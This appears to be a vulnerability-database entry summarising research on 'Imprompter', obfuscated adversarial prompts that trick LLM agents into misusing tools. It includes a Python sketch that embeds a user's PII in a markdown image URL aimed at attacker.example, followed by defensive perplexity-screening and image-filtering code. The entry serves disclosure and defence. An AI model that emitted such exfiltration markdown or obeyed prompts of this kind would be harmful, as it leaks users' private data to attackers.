LMVD-ID: a7064844
Published October 1, 2024

Agent Tool Misuse Attacks

Research Paper

Imprompter: Tricking LLM Agents into Improper Tool Use

Description: Large Language Model (LLM) agents are vulnerable to obfuscated adversarial prompts that induce tool misuse. These prompts, crafted through automated prompt optimization, coerce the agent into invoking its tools (e.g., URL fetching, markdown rendering) in ways that leak sensitive user data (e.g., PII) without the user's knowledge. The prompts are obfuscated so that their malicious intent is not apparent to the user.

Examples: See https://imprompter.ai for code and video demonstrations. One demonstrated prompt causes the agent to extract personally identifiable information (PII) from the chat conversation and embed it in a markdown image URL; when the client renders the image, the data is sent to an attacker-controlled server.
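
To make the exfiltration channel concrete, the following is a minimal sketch of the kind of output such a prompt coerces the agent into producing. The field values and the attacker.example domain are illustrative placeholders, not taken from the paper.

    from urllib.parse import quote

    # Hypothetical reconstruction of the exfiltration channel: the adversarial
    # prompt coerces the agent into emitting a markdown image whose URL embeds
    # data extracted from the conversation. "attacker.example" and the PII
    # values below are illustrative placeholders.
    extracted_pii = {"name": "Jane Doe", "email": "jane@example.com"}
    payload = quote("/".join(f"{k}={v}" for k, v in extracted_pii.items()))

    malicious_markdown = f"![source](https://attacker.example/img.png?p={payload})"

    # When the chat client renders this markdown, it issues a GET request for
    # the image URL, silently delivering the query string (the PII) to the
    # attacker's server while the user sees only a broken or invisible image.
    print(malicious_markdown)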

Impact: Confidentiality and integrity violation of user data and resources accessible to the LLM agent. This can lead to data breaches, information leakage (including PII), and unauthorized actions performed on behalf of the user.

Affected Systems: Large Language Model agents utilizing external tools (e.g., URL access, markdown rendering), including but not limited to Mistral's LeChat, ChatGLM, and agents based on Llama 3.1-70B. The vulnerability is likely present in other agents using similar architectures and tool integration mechanisms.

Mitigation Steps:

  • Restrict the types and capabilities of tools accessible to the LLM agent.
  • Implement input sanitization and validation to detect and block potentially malicious prompts, for example via perplexity scoring (though this may not be fully reliable); see the screening sketch after this list.
  • Monitor LLM agent activity for suspicious tool usage patterns, such as unexpected outbound image or URL requests; see the output-filtering sketch below.
  • Regularly update and patch LLM agent software and underlying models.
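
As an illustration of the perplexity-scoring idea above, the following sketch screens incoming prompts with an off-the-shelf GPT-2 model from the Hugging Face transformers library. The choice of scoring model and the threshold value are assumptions for illustration, and, as noted, optimized low-perplexity prompts may still evade such a filter.

    import torch
    from transformers import GPT2LMHeadModel, GPT2TokenizerFast

    # Minimal sketch of perplexity-based prompt screening. GPT-2 as the
    # scoring model and the threshold value are illustrative assumptions;
    # optimizer-generated gibberish tends to score far higher than natural
    # language, but low-perplexity attacks can still slip through.
    tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")
    model = GPT2LMHeadModel.from_pretrained("gpt2")
    model.eval()

    def perplexity(text: str) -> float:
        """Return the language-model perplexity of the given text."""
        ids = tokenizer(text, return_tensors="pt").input_ids
        with torch.no_grad():
            loss = model(ids, labels=ids).loss  # mean token cross-entropy
        return torch.exp(loss).item()

    PERPLEXITY_THRESHOLD = 500.0  # assumed cutoff; tune on benign traffic

    def looks_adversarial(prompt: str) -> bool:
        """Flag prompts whose perplexity exceeds the screening threshold."""
        return perplexity(prompt) > PERPLEXITY_THRESHOLD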

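Tool restriction and monitoring can also be applied to the agent's output before it is rendered, closing the markdown-image channel directly. The sketch below strips image links whose host is not on an allowlist; the allowlist contents and function names are illustrative assumptions rather than a documented countermeasure from the paper.

    import re
    from urllib.parse import urlparse

    # Minimal sketch of output-side filtering for the exfiltration channel
    # described above: markdown images pointing at non-allowlisted hosts are
    # removed before the client renders the agent's reply. The allowlist is
    # an assumed example.
    ALLOWED_IMAGE_HOSTS = {"cdn.example.com", "images.example.com"}

    MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

    def strip_untrusted_images(agent_output: str) -> str:
        """Remove markdown images whose host is not explicitly trusted."""
        def _filter(match: re.Match) -> str:
            host = urlparse(match.group("url")).hostname or ""
            return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
        return MARKDOWN_IMAGE.sub(_filter, agent_output)

    # Example: an injected image carrying data in its query string is removed,
    # so the client never issues the outbound request.
    print(strip_untrusted_images("Here you go ![x](https://attacker.example/a.png?p=leak)"))
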
© 2025 Promptfoo. All rights reserved.